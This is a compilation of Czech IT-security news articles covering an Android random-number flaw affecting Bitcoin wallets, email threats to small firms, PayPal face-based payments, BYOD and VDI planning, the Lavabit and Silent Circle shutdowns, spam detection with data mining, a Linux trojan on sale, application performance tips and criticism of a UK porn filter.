"Vzhledem k tomu, že problém je s operačním systémem Android sám, tento problém bude mít vliv na vás, pokud máte peněženku vytvořený jakýmkoliv aplikace pro Android. Aplikace, kde nemáte kontrolu soukromých klíčů vůbec nejsou ovlivněny. Například, výměna přední díly jako Coinbase nebo MT GOX apps nejsou ovlivněny tento problém, protože soukromé klíče nejsou generovány na vašem telefonu Android. "
Bezpečnostní inženýr společnosti Google, Mike Hearn, vysvětlil zranitelnost v e-mailu na Bitcoin vývojářů, podle ITProPortal: "Před několika dny jsme se dozvěděli, že provádění Android třídy Java SecureRandom obsahuje četná těžká vulnerabilities.As důsledku všechny soukromé klíče generován na Android telefony / tablety jsou slabé a některé podpisy byly pozorovány již kolize R hodnoty, což soukromý klíč musí být vyřešeny a peníze mají být ukradené. "
ESET Malware výzkumník Robert Lipovský psal v předchozím Žijeme bezpečnostní funkce, které Bitcoin a ostatní šifrovací měny jsou terčem kybernetických zločinců.
"Tam jsou četné malware rodinám, které dnes buď provést Bitcoin mining nebo přímo ukrást obsah Bitcoin obětí peněženky, nebo oba," píše Lipovský.
Bitcoin doporučuje uživatelům, "Aby znovu zachování stávajících peněženky, klíče rotace je nutné. Jedná se o vytvoření nového adresu s opraveného generátoru náhodných čísel a pak jej pošle všechny peníze v peněžence zpět k sobě. Pokud používáte peněženku Android pak důrazně doporučujeme upgrade na nejnovější verzi k dispozici v Play Store, jakmile se člověk stává k dispozici. Jakmile je vaše peněženka se otáčí, budete muset kontaktovat někoho, kdo uložené adresy generované telefonu a dát jim novou. "
Postu Bitcoin peněženky "v ohrožení", díky Android chybu zabezpečení poprvé objevil na Žijeme zabezpečení.
Chraňte firemní e-mailové schránky
Zatímco firmy spoléhají na e-mailovou korespondenci čím dál více, zejména malé a střední společnosti se stávají čím dál zranitelnějšími vůči vzrůstající agresivitě a sofistikovanosti internetových hrozeb.
Zabezpečení
E-mail nebo elektronická pošta zásadně změnil způsob, jakým komunikujeme - a to jak k lepšímu, tak i k horšímu. Zatímco firmy spoléhají na e-mailovou korespondenci čím dál více, zejména malé a střední společnosti se stávají čím dál zranitelnějšími vůči vzrůstající agresivitě a sofistikovanosti internetových hrozeb. Moderní škodlivé programy neboli malware, včetně počítačových virů, červů, trojanů a spywaru, se přenášejí nejčastěji právě e-mailem.
Články v médiích nejčastěji mluví o spamu, který se šíří typicky prostřednictvím elektronické pošty. Jeho udávaný podíl na celkovém množství odeslaných emailů se liší v závislosti na zdroji a aktuální situaci, můžeme ale konstatovat, že přes 80 % veškerých e-mailů je nevyžádaná pošta obsahující pochybné obchodní nabídky, popřípadě rovnou škodlivé přílohy s viry nebo spywarem.
Pro malé a střední firmy takové množství spamu znamená zásah do každodenní produktivity zaměstnanců. A to i přesto, že jeho největší část je odfiltrována, aniž by to uživatel vůbec zaznamenal. Standardní ochranu před těmito hrozbami představují antispamové a antimalwarové programy instalované na koncové stanice, přičemž většina firem taková opatření mylně považuje za dostatečná.
V současnosti se bohužel na základní softwarovou ochranu nelze spoléhat na 100 %. Svět počítačového zločinu se neustále mění. Kyberzločinci se přestávají orientovat na velké firmy, jejichž zabezpečení často odpovídá rizikům souvisejícím s možností napadení. Místo toho se útočníci raději zaměří na více menších cílů, u kterých není potenciální zisk tak velký, zato zde ovšem mají mnohem vyšší šance na úspěch.
Nejčastější e-mailové hrozby
Nejčastějšími nástrahami pro firmy do 100 zaměstnanců jsou klasické spamové útoky, nevyžádaná pošta s infikovanými přílohami nebo závadnými odkazy, a také phishing, jehož prostřednictvím se útočník snaží vymámit z uživatele citlivé údaje a hesla prostřednictvím falešných webových stránek nebo metod sociálního inženýrství.
Relativně stále neprobádanou a velice zákeřnou metodou je pak cílená forma phishingu, zaměřená na konkrétní osoby s přístupem k těm nejcennějším datům a informacím. Takové útoky jsou koncipovány za účelem krádeže osobní identity nebo získání kontroly nad počítačem. Přístup k němu zločincům slouží jako prostředek k napadení celofiremní sítě.
Dobře známé jsou také tzv. útoky DHA (Directory Harvest Attack), tj. získávání e-mailových adres prostřednictvím masivní vlny e–mailů s běžnými jmény, jež spamerům odhalí ty opravdu funkční. Nelze zapomenout ani na DDoS útoky, kterými mohou hackeři narušit e-mailovou komunikaci ve firmě pomocí bombardování e-mailových serverů tunami nevyžádané pošty.
Potenciální škody způsobené těmito hrozbami přesahují tradiční nepohodlí a snížení produktivity zaměstnanců, které si spojujeme s běžným spamem. Naopak mohou snadno přerůst ve vážné problémy, jako jsou úniky dat, finanční ztráty, zneužití informací o zákaznících nebo poškození dobrého jména značky.
Důležitou bariérou před kybernetickými útoky je ochrana serverů, na nichž se nacházejí nejdůležitější elektronická aktiva firmy. Právě pro ně je určen produkt ESET Security pro Microsoft SharePoint Server, jenž dokáže ochránit servery a soubory v reálném čase. Jsou tak zabezpečeny před kybernetickými hrozbami, včetně těch, které se zaměřují na přístup k systémovým souborům.
Technologie ESET navíc přináší ověřenou ochranu, aniž by zatěžovala systémové prostředky důležité pro plynulý chod prioritních úloh serveru. Firmy různých velikostí tak mohou efektivně chránit své SharePoint Servery.
ESET Security pro Microsoft SharePoint Server nabízí antivirovou a antispywarovou ochranu, filtrování založené na pravidlech, plynulou identifikaci operací a funkcionality ESET SysInspector a ESET SysRescue. Řešení lze vzdáleně spravovat prostřednictvím nástroje ESET Remote Administrator.
Produkt, který je k dispozici i v české jazykové verzi, umožňuje administrátorům aplikovat komplexní bezpečnostní politiku, provádět v reálném čase nepřetržité hloubkové skenování celého datového úložiště SharePoint v rámci databáze, a to podle plánu nebo na vyžádání.
PayPal odvážně používá rozpoznávání tváře
V Londýně od vás přijmou paypalovou platbu a stačí vám k tomu jen váš obličej. Což ovšem někteří bezpečnostní odborníci nepovažují za příliš rozumné řešení.
Zabezpečení | Ochrana | Biometrika
PayPal začíná na hlavních třídách Londýna používat pro identifikaci platebních technologii rozpoznávání tváří, metodu, kterou řada bezpečnostních expertů označuje za rizikovou.
Na firemním blogu PayPal prohlásil: „Vaše profilové fotografie byly vždy branami do vašeho online sociálního světa, ale nyní vám otevírají cestu k platbám ve světě fyzickém.“ Podle tohoto giganta elektronických plateb se obchody v Richmondu, jihozápadní části Londýna, pustily do bitvy, jejichž výsledkem může být odsouzení peněženek na smetiště dějin.
Obchodníci umožňují zákazníkům zaplatit pouze pomocí jejich mobilního telefonu a jejich fotografie. V mobilní aplikaci PayPalu přibyla záložka nazvaná „Místní“, kterou lze použít pro vyhledání obchodů a restaurací poblíž uživatelovy pozice, které akceptují mobilní platby PayPalu. Vlastník konta se potom může přihlásit stejně, jako by to udělal na sociálních sítích Facebook nebo Foursquare, a okamžitě zaplatit přímo z aplikace.
Jakmile se zákazník přihlásí, jeho jméno a fotografie se objeví na obrazovce pokladny obchodu a obsluha zúčtování odsouhlasí dotekem na obrázek nakupujícího. Prakticky ve stejný okamžik na telefon zákazníka dorazí zpráva o tom, kolik bylo zaplaceno, a přes email je zaslána standardní elektronická faktura PayPalu.
Mezi obchody v Richmondu, které systém využívají, zatím patří Cook & Garcia, The Farmery, The Tea Box, The Bingham Hotel, Revolution, Caffé Paolo, The Cedar Coffee Shop, Urban Diner, Pier 1 Fish and Chips, Noble Jones, Hill Café a Knot Coffee and Pretzel. Samozřejmě lze očekávat, že stejné obchodní řetězce v pobočkách v jiných městech i zemích budou opět první, kteří novou službu do dané lokality přinesou.
Podle Roba Harpera, ředitele retailových služeb PayPalu, jde pro místní obyvatele o zcela novou životní zkušenost. „Nyní mohou nechat peněženky doma a vyrazit bezstarostně nakupovat. Navíc tak jde o velkou pomoc pro místní obchody bez ohledu na jejich velikost, které nemusí přijít o žádný prodej, který se nezrealizuje jen proto, že zájemce u sebe nemá dostatečnou hotovost.“
Méně nadšeni jsou ovšem odborníci na bezpečnost. Například podle Andyho Kemshalla, technického ředitel bezpečnostní firmy SecurEnvoy, která se specializuje na vícefázové ověřování: „Nový systém PayPalu je první ve Velké Británii, který k autorizaci plateb využívá fotografií zákazníků. Proběhnutí transakce závisí na prodavačích, kteří porovnávají tváře s fotografií. Jde o riskantní metodu, kde může velmi snadno dojít k chybě, ať už úmyslné či neúmyslné. Jiné principy ověřování na mobilních zařízeních, jako je například potvrzování přes SMS, jsou bezpečnější a cenově efektivnější. Bezpečnostní technologie musí mít spolehlivé na 99,9 procent a současná biometrie se k této míře spolehlivosti ani zdaleka nepřibližuje.“
Manažer bezpečnosti: BYOD dostane velkou podporu
Klíčovou technologií pro bezpečné používání osobních zařízení v síti je infrastruktura virtuálních desktopů.
Bezpečnost | Mobil
Trouble Ticket Co řešit: Začíná se realizovat záměr ředitele IT umožnit větší využití zařízení vlastněných samotnými zaměstnanci. Akční plán: Bezpečně implementovat VDI, aby bylo možné identifikovat uživatele i při použití neznámých zařízení.
Děláme velké pokroky směrem k cíli našeho ředitele IT umožnit používání vlastních zařízení pro pracovní účely (BYOD). Pro mě to určitě není předčasné.
Důvodem je, že pracovníci stále hledají způsoby, jak si vlastní počítače Mac, tablet PC a další mobilní přístroje připojit do našeho interního firemního prostředí, a to jak v zaměstnání, tak i vzdáleně.
Při dosavadní absenci zásad to fungovalo tak, že se vše mohlo dělat do doby, než byl někdo přistižen. Přijetím nového trendu a vytvořením pokynů máme šanci kontrolovat, co je připojeno do naší sítě, a naše prostředí tak lépe zabezpečit.
Klíčová role VDI Jednou z důležitých technologií, které to umožní, je VDI (infrastruktura virtuálních desktopů) – pokud je ale nasazena vhodným způsobem. Tento týden jsem se setkal s týmem projektu VDI, abych zajistil, že to tak opravdu bude.
Jednou z výhod toho, že umožníte připojení do své sítě jen známým zařízením, je, že můžete sledovat počítače uživatelů i jejich lokalitu, protože znáte všechny IP adresy, názvy počítačů a MAC adresy, které jsou povoleny.
Množinu zařízení, která se připojují k síti, lze ale rozšířit, protože samu identifikaci pracovníka zajistí právě VDI. Pokud se například do sítě dostane nějaký malware, využijeme audit a logy událostí a náš nástroj SIEM (správa událostí a incidentů zabezpečení) k tomu, abychom vypátrali zdroj nákazy.
Plánujeme tedy, že povolíme přístup k VDI i z nedůvěryhodných prostředí – například z počítače v internetovém kiosku někde na cestě kolem světa. Jedním z mých požadavků je, aby byl se použil režim izolovaného prostoru, který zajistí nemožnost přímé interakce mezi nedůvěryhodným počítačem a prostředím VDI.
Díky tomu nedokáže malware proniknout do pro nás důvěryhodného prostředí VDI a zároveň nebude možné stáhnout duševní vlastnictví firmy do vzdáleného počítače. (Některá taková omezení ale půjde vypnout, pokud VDI zjistí, že vzdálený stroj je ve vlastnictví naší firmy.)
Chci také přísná pravidla ohledně vypršení času relace a pro zamčení obrazovky, aby se zmírnily problémy vznikající z opominutí pracovníků, kteří by opustili veřejně dostupný počítač třeba v kavárně bez odhlášení z VDI.
Řešení VDI může být užitečné také při řízení přístupu dalších lidí. To zahrnuje prodejce, partnery, dodavatele, distributory, smluvní partnery či konzultanty. Někteří z těchto pracovníků potřebují přístup k naší infrastruktuře a aplikacím, ale poskytnout jim VPN klienta může být noční můrou, protože pro každý případ je potřeba mít různé úrovně přístupu.
VDI nám umožní použít konfiguraci se známým „pravidlem minimálního oprávnění“ (což je jedna z mých základních bezpečnostních zásad) pro všechny naše pracovníky a spolupracovníky. To pomůže lépe chránit naši infrastrukturu a omezit případné vyzrazování duševního vlastnictví.
Vlastnosti bezpečnostního řešení Řekl jsem také projektovému týmu, že potřebujeme přihlašovací banner upozorňující uživatele, že budou omezeni ve svém soukromí. Naše právní oddělení totiž vyžaduje, abychom uživatele přinutili odsouhlasit kliknutím možnost, že naše společnost může sledovat jejich aktivitu.
Další z mých požadavků je, aby na hostitelském počítači nezůstaly žádné údaje týkající se činnosti VDI poté, co se uživatel odhlásí. To je obzvláště důležité, pokud je počítač nedůvěryhodný (jako například v internetové kavárně).
Kromě toho musí být prostředí VDI integrováno do služby Active Directory, aby bylo možné automaticky vypnout VDI pro bývalé či pro současné zaměstnance, kteří již takový přístup nepotřebují.
A nakonec – jako u všech vzdálených připojení – musí být jakýkoli přístup k prostředí VDI šifrován a musí vyžadovat dvoufaktorovou autentizaci.
Poskytovatel šifrované pošty: Nepoužívejte služby z USA
Své služby přestali nabízet už dva poskytovatelé šifrovaných e-mailových služeb, protože se cítí ohroženi tím, že by museli na vyžádání amerických úřadů odtajnit data svých zákazníků.
Šifrování | KyberSecurity
Lavabit a Silent Circle, kteří nabízeli služby šifrování e-mailů, se rozhodli zastavit svou činnost. Hlavním důvodem jsou obavy o to, že by svým zákazníkům nemohli zaručit naprosté soukromí. K dešifrované e-mailové komunikaci totiž může kdykoli získat přístup některý z amerických úřadů zabývajících se národní bezpečností.
Ladar Levison, majitel Lavabitu, oznámil, že pozastavil provoz své firmy, ale protože je americkými federálními zákony vázán mlčenlivostí, nemůže zcela vysvětlit proč. Šifrovanou e-mailovou službu Lavabit použil Edward Snowden ke komunikaci s novináři, když jim prozrazoval informace ze zákulisí špehování dat na americkém území.
„Bohužel mi zákony neumožňují podělit se s vámi o události, které vedly k mému rozhodnutí,“ napsal Levison. „Nemohu. Mám za to, že byste měli vědět, co se děje. Podle prvního dodatku ústavy bych měl mít svobodu slova i v takovýchto situacích. Bohužel, Kongres schválil zákony, které mi toto právo upírají,“ dodal.
Podle úřadu národní bezpečnosti musí příjemce elektronické pošty úřadům prozradit její obsah a nesmí se zmínit nejen o tom, ale dokonce ani o tom, že nějakou poštu vůbec dostal. Levison proto svým zákazníkům doporučuje: „Nesvěřujte svá data žádné společnosti, ani soukromé, která má fyzické vazby na Spojené státy.“
Společnost podala podnět k federálnímu soudu, protože se domnívá, že je ohrožena americká ústava. V souvislosti s tím založila nadaci Lavabit Legal Defense Fund, které má shromažďovat prostředky na právní boj s americkými zákonodárci.
Druhou společností, která ukončila své šifrované služby, je Silent Circle. Její služba Silent Mail již není k dispozici, společnost však dále podniká a nabízí všechny ostatní služby. Společnost na svém webu odkazuje na případ Lavabitu a na vysvětlenou dodává: „Signály nám jsou jasné. Proto jsme usoudili, že nejlepší pro nás bude Silent Mail zastavit. Prozatím se na nás žádný americký úřad neobrátil, proto nemáme svázané ruce.“
V prohlášení se dále uvádí, že tato americká společnost ukládá data svých zákazníků na území USA a přesto, že jsou šifrovaná, nebyla by v bezpečí. Společnost proto rozhodla, že s ohledem na soukromí jejích zákazníků bude lepší, když přestane data přijímat a ukládat, což znamená ukončení služby.
Mezi další produkty společnosti patří služby Silent Phone, Silent Text a Silent Eyes, které jsou zabezpečeny přímo mezi dvěma komunikujícími subjekty a společnost tak nemusí ukládat žádná data. „Nemáme ani zašifrovaná data, ani neukládáme žádná metadata o jednotlivých konverzacích,“ uvádí společnost. Když tyto údaje nemáme, nemůžeme je ani nikomu vyzradit.
Silent Circle své zdůvodnění vypnout službu Silent Mail vysvětluje samotnou podstatou e-mailových protokolů, které jsou otevřené, a tím i nezabezpečené. „Samotné e-mailové protokoly obsahují příliš mnoho míst, kde může docházet k úniku informací, a příliš mnoho metadat odhalujících informace o komunikujících,“ uvádí se dále v prohlášení.
Zákazníkům doporučují používat zachované služby, které nabízejí zabezpečenou komunikaci dvou subjektů a o kterých nevlastní společnost žádné záznamy, natož jejich obsah.
BYOD: Klíčem je zabezpečení
Trend směřující k používání vlastních zařízení pro firemní účely bývá propagován hlavně vedoucími pracovníky, kteří trvají nejen na připojení svých osobních přístrojů do firemní sítě, ale odmítají předat kontrolu nad nimi manažerům bezpečnosti.
Mobil | Bezpečnost
Tváří v tvář prudkému nárůstu počtu mobilních zařízení a současnému doslova úprku směrem ke cloudových službám nastává tedy důležitá otázka, jak může běžný firemní specialista na zabezpečení IT na tuto situaci reagovat?
Tento obtížný úkol je ještě složitější, protože mnoho spotřebitelů své mobilní telefony již připojilo k řadě cloudových služeb, jako jsou Google Gmail, Apple iCloud či různé služby sociálních medií.
Výsledkem tohoto procesu je konzumerizace přinášející s sebou do firem všechna nebezpečí cloudových prostředí stejně jako všechny tradiční bezpečnostní problémy spojené s mobilními přístroji.
Se zařízeními, která si zaměstnanci i management podniků přinášejí, tak dostávají staré problémy zcela nový význam.
Jasně daná cesta „Důležité je, že lidé, kteří mají kontrolu nad vaším rozpočtem, nyní trvají na konzumerizaci,“ říká Dave Asprey, viceprezident pro zabezpečení cloudu společnosti Trend Micro.
„Máme mobilní zařízení, která se stále vyvíjejí a zlepšují. Společnosti už nechodí a neříkají: Chtěli bychom pořídit notebook všem ve firmě, ale prohlašují: Rádi bychom spravovali notebook každého ve firmě. Takto tedy vypadá nástup konzumerizace.“
I přes uživatelské nadšení z používání mobilních zařízení je mnoho uživatelů slepých k souvisejícímu riziku, které představují. Vzhledem k tomu, kolik lidí již využívá různé cloudové služby, představují mobilní zařízení v podniků zvýšená rizika vyplývající z přímého vystavení službám veřejného cloudu.
„Cloud a mobilita jsou v chápání lidí využívajících tato zařízení již zcela smíchány,“ tvrdí Asprey. „Když slyšíte o konzumerizaci a strategiích BYOD, obsahují cloud jako nedílnou součást. Jak mobilita pokračuje v plošném pronikání do celé populace, přestává ‚cloud‘ znamenat ‚v datovém centru‘ a začíná znamenat ‚někde jinde‘.“
To představuje zcela novou výzvu pro bezpečnostní odborníky, pro které odklon od přísně spravovaných vnitřních zařízení znamená zásadní změnu bezpečnostní situace.
V tomto novém světě mají největší zkušenosti autoři malwaru – jak o tom svědčí jejich úspěšné provozování globálních sítí schopných spravovat sebe sama a samovolně vniklých do milionů mobilních i klasických počítačů po celém světě.
Tyto sítě představují podobu příštích cloudových prostředí, protože šíření mobilních zařízení vede k přirozenému závěru: cloud budoucnosti bude tvořen uzly rozmístěnými na zcela libovolných místech, bude propojen běžnými linkami a bude za provozu realokovat výpočetní i úložnou kapacitu.
Protože tento model podle všeho vítězí, musí bezpečnostní odborníci přizpůsobit svá očekávání – v globálně distribuovaném modelu nemůže být klíčem k bezpečnému výkonu z podstaty věci „znalost všeho“, co se děje uvnitř sítě.
„Protože spravujete zařízení, která se připojují všude možně, vaše tradiční monitorování výkonu nebude fungovat: když budete spravovat cloud distribuovaných služeb, některé z nich nebudou reagovat na vaše požadavky. Budete využívat statistiku ve větším rozsahu než nyní a plánování úloh bude více ad hoc,“ vysvětluje Asprey.
Data ukládáná vně firemní IT Cloudově založené úložiště celou záležitost dále zkomplikuje, protože rozšířené distribuované modely ukládání dat znamenají, že informace budou distribuovány v mezinárodních sítích a externích službách veřejného cloudu.
To představuje technické, bezpečnostní a – zejména, což je důležité – regulatorní výzvy, protože vlády stále více harmonizují své cíle pro soukromí a zásady s rostoucí distribuovaností podstaty cloudu.
Sám Asprey tento budoucí model cloudu nazývá „okolním cloudem“. Podle něj je klíčem kjeho udržení pod kontrolou zaměřit se na zabezpečení nesčetného množství zařízení přicházejících do firmy.
„Chcete-li zabezpečit cloudové služby, musíte především zabezpečit svá mobilní zařízení. Jsou to jeho přístupové body,“ vysvětluje Asprey. „Jestliže někdo ztratí svůj nezabezpečený telefon a má v něm všechna svá hesla a další důvěrné údaje, je váš cloud kompromitován.“
Detekce spamu metodami dataminingu (2)
Zatímco v minulém díle jsme se zaměřili na průběh celého dataminingového procesu při detekci spamu a odpovídající přípravu dat, dnes se budeme věnovat způsobům výběru vhodných modelů, které předpovídají proměnnou se dvěma stavy.
Spam
V našem případě mohou být zprávy spamem, nebo jím naopak nejsou. Mezi další podobné úlohy patří například retence odchodu zákazníka, prevence podvodů nebo segmentace klientů vzhledem k zájmu o nějaký výrobek.
V minulém díle jsme mimo jiné zdůraznili, že pro účely modelování je vhodné původní zprávy rozdělit na dvě části – na trénovací množinu, pomocí které modely vytvoříme, a na testovací, na níž budeme hodnotit jejich kvalitu a navzájem je porovnávat.
Nejjednodušším způsobem, jak toto rozdělení provést, je každou zprávu přiřadit náhodně se stejnou pravděpodobností buď do trénovací, nebo do testovací množiny. Vzniklé množiny sice nemusí být stejně velké, ale to vzhledem k principu nevadí, navíc je tento způsob rozdělení výpočetně nenáročný.
Cílová kategorie Při modelování se k predikované proměnné přistupuje tak, že se jedna kategorie označí jako cíl. V tomto případě se uvažuje, že cílem bude „Zpráva je spam“. Poté lze zavést pojem senzitivita modelu, to jest citlivost modelu v procentech na správné označení cíle („Zpráva je spam“).
V naší situaci bude tedy senzitivita udávat, kolik procent spamu se správně odfiltrovalo. Analogicky se mluví o specifičnosti modelu. Ta bude informovat o tom, jaký podíl ostatních zpráv neskončilo chybně ve spamovém koši.
Hledání modelů Ačkoliv jsou při detekování spamu oblíbené hlavně modely naivních Bayesovských klasifikátorů, není nezbytně nutné se omezovat pouze na ně. Při modelování je možné použít širokou škálu různých metod.
Mezi populární algoritmy patří například klasifikační stromy, logistická regrese, metoda nejbližších sousedů, podpůrné vektory anebo neuronové sítě. Většina těchto metod je navíc parametrizovatelná – jedním algoritmem tedy lze vytvořit více modelů pro různé parametry.
Při detekci spamu je k dispozici i blacklist zakázaných adres nebo účtů, o kterých se ví, že z nich chodí spam. Dále je možné na základě vlastní zkušenosti zprávě přiřazovat vysokou pravděpodobnost toho, že jde o spam – obsahuje-li například nějaké nevhodné slovo.
Tyto předem známé modely, založené na odborných zkušenostech, se nazývají expertní modely. Nabízí se tedy otázka, jakým způsobem rozhodování různých modelů zkombinovat, a vytvořit tak nově odvozené.
Kombinování modelů Modely dichotomických nebo vícekategoriálních proměnných jsou kromě toho, že případ zařadí do jedné ze skupin, schopny taktéž spočítat konfidenci neboli spolehlivost svého odhadu. Například prvně jmenovaný model bude o zprávě tvrdit, že jde o spam, se spolehlivostí 60 procent.
Druhý naopak rozhodne obráceně a zprávu neoznačí jako spam se určitostí 80 procent. Je již nasnadě, že můžeme vytvořit nový model kombinací obou předchozích tak, že se bude rozhodovat hlasováním váženým podle konfidence těchto modelů. Ve výše uvedeném příkladu by takto nově vzniklý model zprávu za spam nepovažoval.
U více modelů lze toto hlasování dokonce sestavovat hierarchicky, a to znamená, že budou existovat skupiny podřízených modelů, které svým hlasováním vytvoří nové, nadřízené příslušným skupinám. Ty opět mezi sebou budou hlasovat, až nakonec tímto postupným hlasováním vznikne výsledné rozhodnutí.
Porovnávaní modelů pomocí matice záměn Vytvořili jsme několik modelů, které vznikly různými technikami, změnou parametrů nebo kombinováním jiných modelů. Pojďme se nyní podívat, jakým způsobem se dají mezi sebou porovnávat a jak bychom mohli vybrat pro nás nejvhodnější.
Toto porovnání provedeme právě na testovací množině, která nevstupovala do učení modelu. Zprávy z testovací množiny tedy necháme modely ohodnotit. Jelikož víme, zda se jedná o spam či nikoliv, lze zjistit, v kolika procentech případů se model zmýlil.
Přeučené modely mohou zařadit zprávy z trénovací množiny vesměs správně, avšak na testovací množině by se ukázalo, že se rozhodovaly téměř náhodně.
Trojský kůň pro linuxové distribuce za 2000 dolarů
Ruští zločinci prodávají trojského koně, který dokáže útočit na linuxové distribuce. Zájemcům ho nabízejí za 2 000 dolarů (přibližně 39 000 korun).
Virus
Je snad načase, aby se virů začali obávat i uživatelé Linuxu? Malware pro uživatele Linuxu obvykle nepředstavuje problém. Pokud už se nějaký útok směřovaný na linuxové distribuce jednou za čas objeví, většinou se jedná pouze o pokusy zvědavého programátora, které brzy upadnou v zapomnění. Dobrým příkladem je například Snasko rootkit z roku 2012.
Nyní však bezpečností společnost RSA objevila malware s názvem Hand of Thief, který krade data z linuxových systémů. Podle výzkumníků z RSA funguje na všech patnáct testovaných distribucí a v osmi prostředích.
Součástí malwaru je funkce „form-grabing“, zaměřená na Firefox, Chrome a linuxové prohlížeče (Chromium, Aurora a IceWeasel), funkce zaznamenává i relace HTTPS a shromažďuje ukradená data v databázi SQL.
„Malware je na Linuxu neobvyklý, a to z dobrých důvodů. V porovnání s Windows má Linux menší uživatelskou základnu, což výrazně snižuje počet obětí a tím i případné zisky pro podvodníky,“ uvedla Limor Kessemová, expertka na kyberšpionáž z RSA. „Linux je také open source a to znamená, že všechna slabá místa jsou komunitou opravená celkem rychle.“
Prodejci malwaru naznačují, že by časem mohli software změnit na bankovní malware. Jeho cena by poté stoupla na 3000 dolarů (přibližně 58 000 korun) a dalších 550 dolarů (10 600) by stály aktualizace.
Jak vážně by uživatelé Linuxu měli tuto hrozbu brát? Podle Kessemové se příliš obávat nemusí. Dva tisíce dolarů je podle ní příliš vysoká částka, a to i za standardní malware na Windows, který se dotkne významně většího procenta uživatelů. Kdo by si také koupil program, který se dotkne 0,5 procent desktopů, když si může koupit program zaměřující zbývajících 94 % za třikrát nižší cenu?
„Bez možnosti rozšířit malware tak široce jako je možné ve Windows, se zdá jeho cena přehnaná,“ myslí si Kessemová.
Uchraňte aplikace před selháním
V současné době si žádná firma závisející na on-line zákaznících a procesech nemůže dovolit zhroucení svých klíčových aplikací.
Zabezpečení
Pokud dojde k jednohodinovému výpadku u programu důležitého pro základní firemní procesy nebo obrat, jako je například webový server firmy, může to způsobit ztrátu stovek tisíc dolarů.
Oddělení IT potřebují mít k dispozici jednoduché způsoby, jak zajistit, aby problémy s aplikacemi nepřerostly v závažnější selhání. Je také nezbytné mít plán pro zvládnutí významnějších výpadků.
Jsou to však nejhorší možné scénáře, a přestože jsou důležité, měli by dodavatelé aplikací věnovat čas a prostředky především na vypracování plánu, který by zajistil očekávanou funkci systémů během rutinního firemního provozu.
Takový plán ale musí počítat i s očekávanými špičkami požadavků, jako je například uzavírání účetních knih finančního oddělení na konci každého čtvrtletí nebo uvádění nějakého nového výrobku na trh. Stejně tak je důležité brát v úvahu neočekávané události, které mohou způsobit neobvyklou zátěž aplikací, databází a serverů.
Přinášíme tipy nejúčinnější prevence pro udržení kritických podnikových aplikací v nejlepší kondici.
1. Definujte firemní hodnotu potřebného výkonu softwaru a vytvořte s jeho provozovateli plán řízení výkonu aplikace Sestavte tým složený z pracovníků IT a zainteresovaných osob z provozních částí firmy a dejte jim za úkol definovat obchodní priority či metriky a vytvořit klíčové ukazatele výkonnosti (KPI), případně smlouvy o úrovni služeb (SLA) pro všechny aplikace, lokality a technologické vrstvy.
Znamená to také stanovení prahových hodnot a metrik pro intervenci, nastavení alarmů a nepřetržitý monitoring celé infrastruktury – počínaje sledováním samotného uživatele či transakce až po místo na disku.
Plánování zahrnuje i určení priorit archivace. Nevyužívané nebo jen zřídka používané aplikace a data by neměly spotřebovávat drahé zdroje infrastruktury. Plán by měl obsahovat mapování nejvýkonnějších komponent pro aplikace, které vyžadují nejrychlejší odezvu.
2. Vytvořte profil samotné aplikace Znalost chování aplikace a jeho zdokumentování do profilu pomáhají určit prahové hodnoty aplikace a okamžik případné potřebné intervence. To, jak organizace definuje selhání aplikace ve svých základních systémech, se bude určitě lišit, takže je důležité přizpůsobit tyto profily potřebám zákazníků, požadavkům oboru či legislativy a dalším parametrům definovaným podnikovými divizemi.
Společnosti potřebují mít k dispozici monitorovací řešení udržující přehled o průměrné době odezvy konkrétní aplikace včetně dokumentace základního výkonu a výkonu aplikace během špiček a běžného provozu.
3. Otestujte výkon a vytvořte srovnávací hodnoty Testování výkonu je při plánování výkonu aplikací velmi důležitým krokem, ale při snaze rychle zprovoznit novou aplikaci nebo službu se na něj někdy zapomíná. Pokud oddělení IT vynechá tuto zkoušku, která zajišťuje, že aplikace splňuje základní SLA před zpřístupněním pro uživatele, neexistuje způsob jak zjistit, jestli příslušná aplikace zvládne nárůst požadavků nebo změnu způsobu využívání.
Aplikace možná funguje dobře s 200 uživateli, ale co když jich s ní bude pracovat 500? Automatizační nástroje mohou rychle simulovat scénáře rozsáhlého využívání. Testování výkonu může také poskytnout srovnávací hodnoty metriky výkonu aplikace, což znamená normální časy průměrné odezvy.
4. Monitorujte výkon během reálného provozu Výkon nikdy není konstantní. Vzory využívání a celkové prostředí aplikací se budou měnit bez předchozího upozornění. Aktivní end-to-end monitoring výkonu aplikací během reálného provozu znamená, že problémy ovlivňující zákazníky a způsobující porušení SLA mohou spustit alarmy, takže je personál IT může rychle vyřešit.
Schopnost určit přesné místo a důvod slabého výkonu (prvotní příčinu) v úplném aplikačním toku je životně důležitá, aby mohlo dojít k rychlé reakci. Konečným cílem je automaticky reagovat na problémy s výkonem pomocí přidávání kapacity nebo prováděním změn konfigurace.
5. Povzbuzujte spolupráci mezi týmy aplikací a infrastruktury Manažeři aplikací a infrastruktury nemusí vždy dostatečně spolupracovat. Vývojáři se zaměřují na nové funkce a zlepšení uživatelské zkušenosti, zatímco provozní tým se stará o zajišťování serverů, optimalizaci úložišť a o síťovou architekturu.
Propojení těchto dvou skupin však může odvrátit mnoho aplikačních problémů. Vývojáři by měli provoznímu týmu oznamovat všechny připravované změny v aplikaci.
Zakladatel Wikipedie považuje britský „pornwall“ za nesmysl
Jimmy Wales, tvůrce internetové encyklopedie Wikipedia, označil plán britského premiéra na celostátní omezení přístupu k pornografickému obsahu, za absurdní.
Ostatní
V rozhovoru pro britskou televizní stanici Channel 4 nenechal Wales na nápadu britského premiéra Davida Camerona nit suchou. Myšlenku vytvoření jakéhosi porno filtru označil za „naprosto směšnou“. Současně vyjádřil pochyby, že by něco takového bylo vůbec technicky proveditelné.
Premiér Cameron se o nejbližší plány britské vlády podělil během svého proslovu na akci organizace NSPCC, která se zabývá ochranou dětí.
Vytvoření „velkého pornwallu“, jak se o filtru nyní také hovoří, by v praxi vyžadovalo aktivní zapojení největších britských poskytovatelů internetového připojení. Ti by měli také na starost případné zpřístupnění pornografických stránek těm uživatelům, kteří o to sami projeví zájem. Ostatní uživatelé by měli smůlu.
Není divu, že se Cameronovy smělé plány setkaly s velmi kritickou odezvou. Jedna strana kritiků vidí problém v tom, že takový filtr by šel snadno obejít. Jiní pak argumentují tím, že by to vedlo k plíživé cenzuře.
Wales souhlasí s oběma stranami. Britská vláda by se podle něj měla raději více věnovat prosazování současné legislativy chránící tamní občany před aktivitou kyberzločinců. Místo miliard liber posílaných na boj s teroristy by se prý britští zákonodárci měli více zajímat o každodenní kriminalitu, které jsou na internetu vystaveni běžní uživatelé.
